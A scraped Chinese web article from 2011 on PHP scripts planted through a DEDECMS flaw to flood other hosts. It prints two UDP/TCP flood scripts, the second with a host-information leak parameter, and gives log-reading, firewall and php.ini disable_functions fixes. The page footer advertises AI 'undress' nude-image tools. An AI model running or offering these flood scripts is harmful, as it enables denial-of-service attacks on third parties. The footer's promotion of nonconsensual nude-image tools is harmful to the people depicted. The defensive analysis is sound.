php对外发包引发服务器崩溃的终极解决办法分享
php对外发包引发服务器崩溃的终极解决方法分享
php对外发包引发服务器崩溃的终极解决方法分享
2011年12月28日
总结DEDECMS php对外发包引发服务器崩溃的终极解决方法,希望可以帮助客户解决服务器问题,让网站运行的更好
一、php对外发包分析
用php代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:
以下是代码片段:
$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[\'time\'];
$time = time();
print \'Flooded: $ip on port $rand
\';
$max_time = $time+$exec_time;
for($i=0;$i $max_time){
break;
}
$fp = fsockopen(\'udp://$ip\', $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \'Packet complete at \'.time(\'h:i:s\').\' with
$packets (\' . round(($packets*65)/1024, 2) . \' mB) packets averaging \'.
round($packets/$exec_time, 2) . \' packets/s \\n\';
?>
二、表现特征
一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是服务器不断收到大量数据包.
近期由于DEDECMS出现漏洞而导致大量服务器出现这个问题.
如何快速找到这些站?
你可以打开日志
C:\Windows\System32\LogFiles\HTTPERR\httperr...log,打开今天时间的文件,
里面有类似这样的记录:
2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1
最后三项 783 Disabled 30_FreeHost_1
783就是这个站在IIS中的ID
30_FreeHost_1就是所在池
三、解决办法
1.按上述找到这个网站后停止它.或停止池,并重启IIS.
2.在IP策略,或防火墙中,禁止所有udp向外发送
为了解决这个问题,你也可以调整IP策略,限制udp只能访问特定的DNS服务器IP,如8.8.8.8,除非黑客攻击这个IP,不然攻击也是无效的,你可以在网卡DNS中设置一个你才知道的DNS IP,并且不要公开,然后调用IP策略中的udp open部分就可以解决.(打开IP策略的属性,双击open,将open中的两条udp记录删除任意一条,在保留的这条中,双击,改成 地址 从源地址 任何地址 到目标地址 '特定IP 这个IP就是设置为你自己的DNS IP,如8.8.8.8' 保存后就行了 )
3.用一流信息监控,在SQL拦截及网址拦截中,拦截port=这个关键词(其他关键词可以删除.)
4.也可以直接禁止上面的代码,如改win\php.ini后重启IIS
ignore_user_abort = On
(注意前面的;号要删除)
disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
在后面加上
fsockopen,set_time_limit
但这样会造成很多php程序都不正常.
另外,这也表明你的服务器安全做得不错,如果能入侵.黑客就直接提权了,还DOS做什么?
近期已有新的基于TCP攻击的PHPDDOS代码如下:
以下是代码片段:
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$packets = 64;
ignore_user_abort(True);
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])0){
echo $_GET['rat'].$_SERVER['HTTP_HOST'].'|'.GetHostByName($_SERVER['SERVER_NAME']).'|'.
php_uname().'|'.$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
exit;
}
$max_time = time()+$exec_time;
while(1){
$packets++;
if(time() > $max_time or $exec_time != 69){
break;
}
$fp = fsockopen('tcp://$host', $port, $errno, $errstr, 0);
}
?>
同样,可以采有以下解决办法:
1.也可以直接禁止上面的代码,如改win\php.ini后重启IIS
ignore_user_abort = On
(注意前面的;号要删除)
disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
在后面加上
fsockopen,set_time_limit
但这样会造成很多php程序都不正常. 如果您是IDC,给客户提供空间的,禁用函数可能导致客户程序无法运行,所以一般不要用此办法
2.在IP策略中禁止所有外访的TCP数据包,但这样会造成的采集功能无效,也不能用在主控服务器上。
3.在服务器要用关键词tcp:或udp:搜索所有php类文件,找到攻击文件,删除它。
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1387
52
PHP 8.4 Installation and Upgrade guide for Ubuntu and Debian
Dec 24, 2024 pm 04:42 PM
PHP 8.4 brings several new features, security improvements, and performance improvements with healthy amounts of feature deprecations and removals. This guide explains how to install PHP 8.4 or upgrade to PHP 8.4 on Ubuntu, Debian, or their derivati
7 PHP Functions I Regret I Didn't Know Before
Nov 13, 2024 am 09:42 AM
If you are an experienced PHP developer, you might have the feeling that you’ve been there and done that already.You have developed a significant number of applications, debugged millions of lines of code, and tweaked a bunch of scripts to achieve op
How To Set Up Visual Studio Code (VS Code) for PHP Development
Dec 20, 2024 am 11:31 AM
Visual Studio Code, also known as VS Code, is a free source code editor — or integrated development environment (IDE) — available for all major operating systems. With a large collection of extensions for many programming languages, VS Code can be c
Explain JSON Web Tokens (JWT) and their use case in PHP APIs.
Apr 05, 2025 am 12:04 AM
JWT is an open standard based on JSON, used to securely transmit information between parties, mainly for identity authentication and information exchange. 1. JWT consists of three parts: Header, Payload and Signature. 2. The working principle of JWT includes three steps: generating JWT, verifying JWT and parsing Payload. 3. When using JWT for authentication in PHP, JWT can be generated and verified, and user role and permission information can be included in advanced usage. 4. Common errors include signature verification failure, token expiration, and payload oversized. Debugging skills include using debugging tools and logging. 5. Performance optimization and best practices include using appropriate signature algorithms, setting validity periods reasonably,
How do you parse and process HTML/XML in PHP?
Feb 07, 2025 am 11:57 AM
This tutorial demonstrates how to efficiently process XML documents using PHP. XML (eXtensible Markup Language) is a versatile text-based markup language designed for both human readability and machine parsing. It's commonly used for data storage an
PHP Program to Count Vowels in a String
Feb 07, 2025 pm 12:12 PM
A string is a sequence of characters, including letters, numbers, and symbols. This tutorial will learn how to calculate the number of vowels in a given string in PHP using different methods. The vowels in English are a, e, i, o, u, and they can be uppercase or lowercase. What is a vowel? Vowels are alphabetic characters that represent a specific pronunciation. There are five vowels in English, including uppercase and lowercase: a, e, i, o, u Example 1 Input: String = "Tutorialspoint" Output: 6 explain The vowels in the string "Tutorialspoint" are u, o, i, a, o, i. There are 6 yuan in total
Explain late static binding in PHP (static::).
Apr 03, 2025 am 12:04 AM
Static binding (static::) implements late static binding (LSB) in PHP, allowing calling classes to be referenced in static contexts rather than defining classes. 1) The parsing process is performed at runtime, 2) Look up the call class in the inheritance relationship, 3) It may bring performance overhead.
What are PHP magic methods (__construct, __destruct, __call, __get, __set, etc.) and provide use cases?
Apr 03, 2025 am 12:03 AM
What are the magic methods of PHP? PHP's magic methods include: 1.\_\_construct, used to initialize objects; 2.\_\_destruct, used to clean up resources; 3.\_\_call, handle non-existent method calls; 4.\_\_get, implement dynamic attribute access; 5.\_\_set, implement dynamic attribute settings. These methods are automatically called in certain situations, improving code flexibility and efficiency.
